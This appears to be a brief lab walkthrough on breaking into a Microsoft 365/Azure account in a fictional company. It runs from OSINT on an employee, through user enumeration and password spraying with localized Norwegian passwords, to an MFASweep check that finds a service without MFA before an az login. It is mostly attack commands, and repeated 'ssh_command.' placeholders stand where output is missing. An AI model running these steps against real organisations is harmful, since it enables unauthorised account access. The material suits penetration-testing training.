MFA Sweep Basics

MFA Sweep Basics

Feb 1, 2025
Windows

Ingrid Johansen posted on LinkedIn that she started a new role with Mega Big Tech, working from their Norway office. After identifying her email address, we can attempt to gain access by trying passwords like Passord1! or Velkommen1 (as Azure by default only blocks common passwords in English).

python .\main.py -n "Ingrid Johansen" -d megabigtech.com

ssh_command.

We go on creating a wordlist

ssh_command.

We then find that IJohansen@megabigtech.com is a valid email address

python .\o365enum.py -u wordlist.txt -n 1 -m office.com

ssh_command.

We create an email.txt file with the above valid email address

ssh_command.

python .\oh365userfinder.py -p 'Velkommen1' --pwspray --elist email.txt

ssh_command.

import-module .\MFASweep.ps1

Invoke-MFASweep

ssh_command.

Y

ssh_command.

Y

ssh_command.

ssh_command.

We can see that MFA is not enabled in MS Service Management API

az login

Input the credentials

ssh_command.

az account show

ssh_command.